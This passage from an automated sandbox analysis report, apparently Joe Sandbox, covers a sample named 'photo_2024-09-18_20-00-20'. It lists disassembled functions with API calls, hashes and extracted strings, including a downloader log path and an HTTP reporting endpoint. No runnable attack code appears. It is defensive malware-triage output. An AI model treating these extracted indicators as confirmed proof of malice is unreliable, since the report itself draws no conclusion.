                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3___localtime64_s
                                                                • String ID: %s\mini_downloader%s.zmelog$`Pc
                                                                • API String ID: 3348314555-409215777
                                                                • Opcode ID: d989c12d1223ca27d614d51a44b84251aadeaea2bfb2e7bc5f77beae7093af39
                                                                • Instruction ID: 07ae0579874cbee3080c725679130a5d08fa5887a4d0272f7acc8d1f823baad0
                                                                • Opcode Fuzzy Hash: d989c12d1223ca27d614d51a44b84251aadeaea2bfb2e7bc5f77beae7093af39
                                                                • Instruction Fuzzy Hash: 28119431D00208DADF04EBA5DD5ABDD7FB4AF05309F40806AE511771D2C7B95A45CB98
                                                                Function 004017FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00401809
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 00489107
                                                                  • Part of subcall function 004890F2: __CxxThrowException@8.LIBCMT ref: 0048911C
                                                                  • Part of subcall function 004890F2: std::exception::exception.LIBCMT ref: 0048912D
                                                                • _memmove.LIBCMT ref: 00401844
                                                                Strings
                                                                • invalid string position, xrefs: 00401804
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                • String ID: invalid string position
                                                                • API String ID: 1785806476-1799206989
                                                                • Opcode ID: 6d60eba8b75255d99852df487f8a0cc2f230fda04e764ce1a74773b50fd49ad5
                                                                • Instruction ID: bf2b7c359bdbf17c1657dccd032e40d11d933f0d33991f05ba7b329a1631692c
                                                                • Opcode Fuzzy Hash: 6d60eba8b75255d99852df487f8a0cc2f230fda04e764ce1a74773b50fd49ad5
                                                                • Instruction Fuzzy Hash: 8201253270061587C721EE6DDA8481AB3A7BFC5704324893ED082D76A5E774DA468799
                                                                Function 0040C85B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __CxxThrowException@8.LIBCMT ref: 0040C87C
                                                                • std::exception::exception.LIBCMT ref: 0040C89E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: _
                                                                • API String ID: 3728558374-2179862614
                                                                • Opcode ID: 31aa73a7069ccc969de695999b48273e2331ebc74b4f1aa2e05987183f3bd427
                                                                • Instruction ID: 86333a1335a071703cb8ed2bf060eee6ef526989ade19ac6056a17b345a35438
                                                                • Opcode Fuzzy Hash: 31aa73a7069ccc969de695999b48273e2331ebc74b4f1aa2e05987183f3bd427
                                                                • Instruction Fuzzy Hash: 4501D672410208EBCB00FFA5C4465BE7BE5AB41355B24C13BE915AB241E63CCA068B6E
                                                                Function 004489F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00448A03
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890BA
                                                                  • Part of subcall function 004890A5: __CxxThrowException@8.LIBCMT ref: 004890CF
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890E0
                                                                • _memmove.LIBCMT ref: 00448A2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                • String ID: vector<T> too long
                                                                • API String ID: 1785806476-3788999226
                                                                • Opcode ID: d32b4baa0ba96ed792f235d9a1489081c03d34fe874362b3087490b1a454406c
                                                                • Instruction ID: b86c67af59fe3ce7b623f2eecaee786d2e28c4755eb9cd309d98df348406f80d
                                                                • Opcode Fuzzy Hash: d32b4baa0ba96ed792f235d9a1489081c03d34fe874362b3087490b1a454406c
                                                                • Instruction Fuzzy Hash: C601A2B16002099FEB24EEA9CC9283FB7D9EB54304714492FE49BD3741EAB8F8408B55
                                                                Function 0041A533 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0041A53D
                                                                  • Part of subcall function 004160BD: _wcslen.LIBCMT ref: 004160C8
                                                                  • Part of subcall function 00416062: _wcslen.LIBCMT ref: 0041606E
                                                                  • Part of subcall function 00416062: _wcslen.LIBCMT ref: 0041607A
                                                                  • Part of subcall function 00416062: _wcslen.LIBCMT ref: 00416089
                                                                  • Part of subcall function 004160F3: __EH_prolog3_GS.LIBCMT ref: 004160FD
                                                                  • Part of subcall function 00415EAC: _free.LIBCMT ref: 00415EB6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$H_prolog3_$_free
                                                                • String ID: fade='%d'$fade='
                                                                • API String ID: 1880228477-4197070306
                                                                • Opcode ID: b7baab1b2081c583e80cc9a3f60de6e328abb6ba63ec030fdd4ef086508061d0
                                                                • Instruction ID: fa90111c16bb662960cdbe422486ec97cfd689ee083e8f45be51072c9fcce6ff
                                                                • Opcode Fuzzy Hash: b7baab1b2081c583e80cc9a3f60de6e328abb6ba63ec030fdd4ef086508061d0
                                                                • Instruction Fuzzy Hash: 2E018831A006149FDB05FFA9CC457DD76A5AF45309F01419AF8085B381CBB94F858B9E
                                                                Function 00415BF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • file='%s' corner='%u,%u,%u,%u' hole='true', xrefs: 00415C4A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __swprintf_memset
                                                                • String ID: file='%s' corner='%u,%u,%u,%u' hole='true'
                                                                • API String ID: 1452233324-1715625894
                                                                • Opcode ID: def5e9aa4533f889c57602a3063c683c71ed4e8b060036a4241eb8bcf6e5cabb
                                                                • Instruction ID: 5f8f346234499c1253b3f580fadb5c46ede8aaf1ba8ccda63ac6f46f749b36bc
                                                                • Opcode Fuzzy Hash: def5e9aa4533f889c57602a3063c683c71ed4e8b060036a4241eb8bcf6e5cabb
                                                                • Instruction Fuzzy Hash: 6D111E71600649AFC751DFB9C941FDAB3F9EF04304F00886EA65AF3150DA30BA55CB68
                                                                Function 00457930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0045797E
                                                                • __CxxThrowException@8.LIBCMT ref: 00457993
                                                                Strings
                                                                • invalid map/set<T> iterator, xrefs: 004579D1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                • String ID: invalid map/set<T> iterator
                                                                • API String ID: 4063778783-152884079
                                                                • Opcode ID: eb49eb39d2d19c2e3b10c8dd081a082a18a7aa610e3b7c4c1d6b4698675cedc4
                                                                • Instruction ID: c42f25f0584c0022f1757e2cbe52a24b00c103bd24974ce4d4449efa52389fe4
                                                                • Opcode Fuzzy Hash: eb49eb39d2d19c2e3b10c8dd081a082a18a7aa610e3b7c4c1d6b4698675cedc4
                                                                • Instruction Fuzzy Hash: B5018CB05043059FD750EFA8C945A9ABBF4AB09704F0488AED96987742E771E908CB61
                                                                Function 02480708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 02480717
                                                                  • Part of subcall function 0247E1CD: __getptd_noexit.LIBCMT ref: 0247E1D0
                                                                  • Part of subcall function 0247E1CD: __amsg_exit.LIBCMT ref: 0247E1DD
                                                                • __getptd.LIBCMT ref: 02480725
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                • String ID: csm
                                                                • API String ID: 803148776-1018135373
                                                                • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                                                • Instruction ID: fe0897be2890d7b96bb16666f20dabacf32f592c6ca65e77f3370afc47c6b274
                                                                • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                                                • Instruction Fuzzy Hash: F7014B348216048BCF39AF66C480BAEB3B6AF00751F54692FD4909A660CF308988CF41
                                                                Function 10010704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 10010713
                                                                  • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                                                  • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                                                • __getptd.LIBCMT ref: 10010721
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                • String ID: csm
                                                                • API String ID: 803148776-1018135373
                                                                • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                                                • Instruction ID: 69e9575505c20a4c0929deabb4f4008ee8848d00d0d14bc8a6ce3e821bcd4481
                                                                • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                                                • Instruction Fuzzy Hash: E5012838E053059EDB24CF61D854A9DB7F5EF04391F21492EF4819A695CBB0EDC4DE41
                                                                Function 00402934 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • http://zmlog.duoyi.com:8080/api/zm/data/rece_download_data, xrefs: 0040297C, 00402981
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_wcslen
                                                                • String ID: http://zmlog.duoyi.com:8080/api/zm/data/rece_download_data
                                                                • API String ID: 3746244732-116479537
                                                                • Opcode ID: a46b0c4be3354f4d67574a4276cc661f4b5235485e22b806272ceff78bb92c97
                                                                • Instruction ID: 9076eb17935aa50dc60d82099e7038e94875876c9af84a3750b641b730ec8fac
                                                                • Opcode Fuzzy Hash: a46b0c4be3354f4d67574a4276cc661f4b5235485e22b806272ceff78bb92c97
                                                                • Instruction Fuzzy Hash: 3301FBB1D05341CBD709DF69AD117183AE3AB59304B14A06FD008DB361D7B50548CBE9
                                                                Function 0043314E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00433155
                                                                  • Part of subcall function 004166C3: __EH_prolog3.LIBCMT ref: 004166CA
                                                                  • Part of subcall function 004166C3: _memset.LIBCMT ref: 00416823
                                                                  • Part of subcall function 004166C3: _memset.LIBCMT ref: 00416832
                                                                  • Part of subcall function 004166C3: _memset.LIBCMT ref: 00416841
                                                                  • Part of subcall function 004166C3: _memset.LIBCMT ref: 00416850
                                                                  • Part of subcall function 004166C3: _memset.LIBCMT ref: 0041685F
                                                                • _memset.LIBCMT ref: 004331B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$H_prolog3
                                                                • String ID: ,>`
                                                                • API String ID: 2144794740-3261144243
                                                                • Opcode ID: f45d90977f368d5f74aa474df6f785482abbd2f3dafacdc0d495fb114834594a
                                                                • Instruction ID: 4a9cb530ddf65629bd83d998f0a19ba22037f09ff8bb92d63e04e247ab0c89d0
                                                                • Opcode Fuzzy Hash: f45d90977f368d5f74aa474df6f785482abbd2f3dafacdc0d495fb114834594a
                                                                • Instruction Fuzzy Hash: 1501CDB5640F048AC7389F39D4057C7BEE4AB06724F104A2EE1BE56B90D7B466448F9A
                                                                Function 00404988 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Zoomed
                                                                • String ID: {
                                                                • API String ID: 1990913835-366298937
                                                                • Opcode ID: 7202f2f2cb3afe53bd3492e64f21cdb6786a1e125ca9288f2d7425d3ab24bd63
                                                                • Instruction ID: 62d1fa6fc0a314b0a710e2a3d1e4fd3bdf6a0a2873c0a448285e72120ca52429
                                                                • Opcode Fuzzy Hash: 7202f2f2cb3afe53bd3492e64f21cdb6786a1e125ca9288f2d7425d3ab24bd63
                                                                • Instruction Fuzzy Hash: F1E0D1713002087FCF112E55DD00857BF99FF853B0B004437F90992220C7759C20E694
                                                                Function 0043542D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __wcsicoll
                                                                • String ID: 6*B$TreeNodeUI
                                                                • API String ID: 3832890014-3524803818
                                                                • Opcode ID: 5b6a6bbe9af80faae9de58abb9a51735f317e8b4bcfc5b4448d7bafbac2a3520
                                                                • Instruction ID: 4ddf862fc2471af866b0e99e753ebcab7b673a2ae675a516cd4417595e32d884
                                                                • Opcode Fuzzy Hash: 5b6a6bbe9af80faae9de58abb9a51735f317e8b4bcfc5b4448d7bafbac2a3520
                                                                • Instruction Fuzzy Hash: C2E0203230030457C608B656E405D6EB38DCF59731B10803BF40087141DF58EC424B99
                                                                Function 00403203 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0040320A
                                                                  • Part of subcall function 00455840: InitializeCriticalSection.KERNEL32(006321FC,0040330D,00000004,0045EF6D,0045A98B,00480037), ref: 00455848
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
